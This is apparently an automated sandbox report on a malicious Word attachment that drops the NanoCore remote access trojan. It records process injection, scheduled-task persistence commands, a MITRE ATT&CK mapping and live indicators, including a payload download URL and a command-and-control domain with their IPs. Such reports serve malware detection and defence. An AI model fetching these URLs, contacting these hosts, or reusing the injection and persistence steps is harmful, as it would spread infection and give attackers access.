Writes to foreign memory regions

Show sources

Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 420000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 422000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 7EFDE008	Jump to behavior

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\catzjt7863.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\catzjt7863.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\catzjt7863.exe C:\Users\user\AppData\Roaming\catzjt7863.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\eWoGxZG' /XML 'C:\Users\user\AppData\Local\Temp\tmp566B.tmp'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp249A.tmp'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp1E64.tmp'	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe 0	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0	Jump to behavior

Source: RegSvcs.exe, 00000007.00000002.706021260.0000000002889000.00000004.00000001.sdmp	Binary or memory string: Program ManagerH
Source: RegSvcs.exe, 00000007.00000002.705246427.00000000007E8000.00000004.00000020.sdmp	Binary or memory string: Program Managerity Mode] - Microsoft Wordicrosoft Word2q
Source: RegSvcs.exe, 00000007.00000002.706021260.0000000002889000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: RegSvcs.exe, 00000007.00000002.705657856.0000000000F60000.00000002.00020000.sdmp, taskeng.exe, 0000000A.00000002.704678226.00000000007C0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegSvcs.exe, 00000007.00000002.705657856.0000000000F60000.00000002.00020000.sdmp, taskeng.exe, 0000000A.00000002.704678226.00000000007C0000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: RegSvcs.exe, 00000007.00000002.705246427.00000000007E8000.00000004.00000020.sdmp	Binary or memory string: Program Managerity Mode] - Microsoft Wordicrosoft Word
Source: RegSvcs.exe, 00000007.00000002.705657856.0000000000F60000.00000002.00020000.sdmp, taskeng.exe, 0000000A.00000002.704678226.00000000007C0000.00000002.00020000.sdmp	Binary or memory string: Program Manager<
Source: RegSvcs.exe, 00000007.00000002.706021260.0000000002889000.00000004.00000001.sdmp	Binary or memory string: Program Manager<

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\catzjt7863.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 7.2.RegSvcs.exe.3678c96.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.560000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.catzjt7863.exe.36dc7e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.564629.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.catzjt7863.exe.36dc7e0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.catzjt7863.exe.35f0330.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.36820f5.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.367dacc.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.560000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.367dacc.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.catzjt7863.exe.359c310.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000000.451843619.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.704763684.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.453026505.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.455467498.00000000034FB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.704932496.0000000000560000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.452221812.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.452672182.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.455829246.000000000374F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.706102715.0000000003676000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: catzjt7863.exe PID: 1848, type: MEMORYSTR

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: catzjt7863.exe, 00000004.00000002.455467498.00000000034FB000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000007.00000002.705701351.0000000002631000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 7.2.RegSvcs.exe.3678c96.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.560000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.catzjt7863.exe.36dc7e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.564629.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.catzjt7863.exe.36dc7e0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.catzjt7863.exe.35f0330.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.36820f5.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.367dacc.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.560000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.367dacc.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.catzjt7863.exe.359c310.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000000.451843619.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.704763684.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.453026505.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.455467498.00000000034FB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.704932496.0000000000560000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.452221812.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.452672182.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.455829246.000000000374F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.706102715.0000000003676000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: catzjt7863.exe PID: 1848, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_003D29EA bind,		7_2_003D29EA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_003D2998 bind,		7_2_003D2998

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution13	Scheduled Task/Job1	Extra Window Memory Injection1	Disable or Modify Tools1	Input Capture11	File and Directory Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer13	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter3	Boot or Logon Initialization Scripts	Access Token Manipulation1	Deobfuscate/Decode Files or Information1	LSASS Memory	System Information Discovery14	Remote Desktop Protocol	Input Capture11	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scheduled Task/Job1	Logon Script (Windows)	Process Injection312	Obfuscated Files or Information3	Security Account Manager	Security Software Discovery11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Scheduled Task/Job1	Software Packing13	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Remote Access Software1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Extra Window Memory Injection1	LSA Secrets	Virtualization/Sandbox Evasion31	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading2	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol222	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion31	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection312	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Hidden Files and Directories1	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Roaming\catzjt7863.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\catzx[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\eWoGxZG.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\SMTP Service\smtpsvc.exe	0%	Metadefender	Browse
C:\Program Files (x86)\SMTP Service\smtpsvc.exe	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
7.0.RegSvcs.exe.400000.3.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
7.0.RegSvcs.exe.400000.2.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
7.0.RegSvcs.exe.400000.1.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
7.0.RegSvcs.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
7.2.RegSvcs.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
7.0.RegSvcs.exe.400000.4.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
7.2.RegSvcs.exe.560000.3.unpack	100%	Avira	TR/NanoCore.fadte	Download File

Domains

Source	Detection	Scanner	Label	Link
binatonezx.tk	15%	Virustotal		Browse
drrkingsleym001.ddns.net	8%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.%s.comPA	0%	URL Reputation	safe
drrkingsleym001.ddns.net	8%	Virustotal		Browse
drrkingsleym001.ddns.net	0%	Avira URL Cloud	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe
http://www.collada.org/2005/11/COLLADASchema9Done	0%	URL Reputation	safe
http://binatonezx.tk/catzx.exe	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
binatonezx.tk	2.56.59.211	true	true	15%, Virustotal, Browse	unknown
drrkingsleym001.ddns.net	103.133.109.121	true	true	8%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
drrkingsleym001.ddns.net	true	8%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://binatonezx.tk/catzx.exe	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.%s.comPA	catzjt7863.exe, 00000004.00000002.457062751.00000000055D0000.00000002.00020000.sdmp, RegSvcs.exe, 00000007.00000002.706673086.00000000059A0000.00000002.00020000.sdmp, taskeng.exe, 0000000A.00000002.704777808.0000000001BC0000.00000002.00020000.sdmp	false	URL Reputation: safe	low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	RegSvcs.exe, 00000007.00000002.706673086.00000000059A0000.00000002.00020000.sdmp, taskeng.exe, 0000000A.00000002.704777808.0000000001BC0000.00000002.00020000.sdmp	false		high
http://servername/isapibackend.dll	schtasks.exe, 00000005.00000002.449453962.0000000000870000.00000002.00020000.sdmp, schtasks.exe, 00000008.00000002.460736263.0000000001CF0000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low
http://www.collada.org/2005/11/COLLADASchema9Done	catzjt7863.exe, 00000004.00000002.454334309.0000000000950000.00000004.00020000.sdmp	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.133.109.121	drrkingsleym001.ddns.net	Viet Nam		135905	VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	true
2.56.59.211	binatonezx.tk	Netherlands		395800	GBTCLOUDUS	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	509411
Start date:	26.10.2021
Start time:	14:31:24
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Purchase order_122.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOC@18/17@22/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 5.5% (good quality ratio 5.1%) Quality average: 87.1% Quality standard deviation: 28.7%
HCA Information:	Successful, ratio: 99% Number of executed functions: 526 Number of non-executed functions: 14
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:31:31	API Interceptor	35x Sleep call for process: EQNEDT32.EXE modified
14:31:35	API Interceptor	37x Sleep call for process: catzjt7863.exe modified
14:31:38	API Interceptor	4x Sleep call for process: schtasks.exe modified
14:31:43	API Interceptor	1389x Sleep call for process: RegSvcs.exe modified
14:31:45	Task Scheduler	Run new task: SMTP Service path: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" s>$(Arg0)
14:31:46	API Interceptor	273x Sleep call for process: taskeng.exe modified
14:31:46	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run SMTP Service C:\Program Files (x86)\SMTP Service\smtpsvc.exe
14:31:49	Task Scheduler	Run new task: SMTP Service Task path: "C:\Program Files (x86)\SMTP Service\smtpsvc.exe" s>$(Arg0)

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
103.133.109.121	b2ZeLApyX2.exe	Get hash	malicious	Browse
	Purchase order_122.doc	Get hash	malicious	Browse
	YKr3m9a7C3.exe	Get hash	malicious	Browse
	SWIFT COPY.doc	Get hash	malicious	Browse
2.56.59.211	SMC Req Offer.doc	Get hash	malicious	Browse	binatonezx.tk/seasonzx.exe
	Original Shipping documents.doc	Get hash	malicious	Browse	binatonezx.tk/villarzx.exe
	payment.doc	Get hash	malicious	Browse	binatonezx.tk/davidhillzx.exe
	_Payment Advise.doc	Get hash	malicious	Browse	binatonezx.tk/trulexzx.exe
	FLOW LINE CONTRACT00939.doc	Get hash	malicious	Browse	binatonezx.tk/asadzx.exe
	QUOTE B1018530.doc	Get hash	malicious	Browse	binatonezx.tk/mazx.exe
	About company.doc	Get hash	malicious	Browse	binatonezx.tk/gregzx.exe
	Purchase order_122.doc	Get hash	malicious	Browse	binatonezx.tk/catzx.exe
	PRICE QUOTATION.doc	Get hash	malicious	Browse	binatonezx.tk/seasonzx.exe
	PROFORMA INVOICE.doc__.rtf	Get hash	malicious	Browse	binatonezx.tk/obinnazx.exe
	Purchase Order.doc	Get hash	malicious	Browse	binatonezx.tk/villarzx.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
binatonezx.tk	SMC Req Offer.doc	Get hash	malicious	Browse	2.56.59.211
	Original Shipping documents.doc	Get hash	malicious	Browse	2.56.59.211
	payment.doc	Get hash	malicious	Browse	2.56.59.211
	_Payment Advise.doc	Get hash	malicious	Browse	2.56.59.211
	FLOW LINE CONTRACT00939.doc	Get hash	malicious	Browse	2.56.59.211
	QUOTE B1018530.doc	Get hash	malicious	Browse	2.56.59.211
	About company.doc	Get hash	malicious	Browse	2.56.59.211
	Purchase order_122.doc	Get hash	malicious	Browse	2.56.59.211
	PRICE QUOTATION.doc	Get hash	malicious	Browse	2.56.59.211
	PROFORMA INVOICE.doc__.rtf	Get hash	malicious	Browse	2.56.59.211
	Purchase Order.doc	Get hash	malicious	Browse	2.56.59.211
drrkingsleym001.ddns.net	b2ZeLApyX2.exe	Get hash	malicious	Browse	103.133.109.121
	Purchase order_122.doc	Get hash	malicious	Browse	103.133.109.121
	YKr3m9a7C3.exe	Get hash	malicious	Browse	103.133.109.121
	SWIFT COPY.doc	Get hash	malicious	Browse	103.133.109.121

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GBTCLOUDUS	SMC Req Offer.doc	Get hash	malicious	Browse	2.56.59.211
	Original Shipping documents.doc	Get hash	malicious	Browse	2.56.59.211
	6FD5C640F4C1E434978FDC59A8EC191134B7155217C84.exe	Get hash	malicious	Browse	2.56.59.42
	setup_x86_x64_install.exe	Get hash	malicious	Browse	2.56.59.42
	0OeX2BsbUo.exe	Get hash	malicious	Browse	2.56.59.42
	AB948F038175411DC326A1AAD83DF48D6B65632501551.exe	Get hash	malicious	Browse	2.56.59.42
	365F984ABE68DDD398D7B749FB0E69B0F29DAF86F0E3E.exe	Get hash	malicious	Browse	2.56.59.42
	C03C8A4852301C1C54ED27EF130D0DE4CDFB98584ADEF.exe	Get hash	malicious	Browse	2.56.59.42
	Fri051e1e7444.exe	Get hash	malicious	Browse	2.56.59.42
	payment.doc	Get hash	malicious	Browse	2.56.59.211
	_Payment Advise.doc	Get hash	malicious	Browse	2.56.59.211
	wA5D1yZuTf.exe	Get hash	malicious	Browse	2.56.59.42
	setup_x86_x64_install.exe	Get hash	malicious	Browse	2.56.59.42
	FLOW LINE CONTRACT00939.doc	Get hash	malicious	Browse	2.56.59.211
	QUOTE B1018530.doc	Get hash	malicious	Browse	2.56.59.211
	About company.doc	Get hash	malicious	Browse	2.56.59.211
	Purchase order_122.doc	Get hash	malicious	Browse	2.56.59.211
	PRICE QUOTATION.doc	Get hash	malicious	Browse	2.56.59.211
	PROFORMA INVOICE.doc__.rtf	Get hash	malicious	Browse	2.56.59.211
	setup_x86_x64_install.exe	Get hash	malicious	Browse	2.56.59.42
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	IMS211323.xlsx	Get hash	malicious	Browse	103.149.12.116
	purchase order # 4459.xls	Get hash	malicious	Browse	103.141.138.110
	6811A4CEA56365431B3799600303C945593A997E61968.exe	Get hash	malicious	Browse	103.114.104.13
	KfvEoN0wIw	Get hash	malicious	Browse	103.68.250.127
	INQ_42-4I090.xlsx	Get hash	malicious	Browse	103.125.190.6
	PO doc 42782.xlsx	Get hash	malicious	Browse	103.125.190.6
	b2ZeLApyX2.exe	Get hash	malicious	Browse	103.133.109.121
	Purchase order_122.doc	Get hash	malicious	Browse	103.133.109.121
	DMS210949 MV LYDERHORN LOW MIX RATIO.xlsx	Get hash	malicious	Browse	180.214.239.85
	payment issue need help.exe	Get hash	malicious	Browse	103.133.110.241
	DMS210949 MV LYDERHORN LOW MIX RATIO.xlsx	Get hash	malicious	Browse	180.214.239.85
	PO1-424480.xlsx	Get hash	malicious	Browse	103.125.190.6
	arm7	Get hash	malicious	Browse	14.225.246.61
	PI Alu Circle_Dt. 14.05.2021.xlsx	Get hash	malicious	Browse	180.214.239.85
	YKr3m9a7C3.exe	Get hash	malicious	Browse	103.133.109.121
	SWIFT COPY.doc	Get hash	malicious	Browse	103.133.109.121
	Airway bill# 7899865792021.xlsx	Get hash	malicious	Browse	103.125.190.6
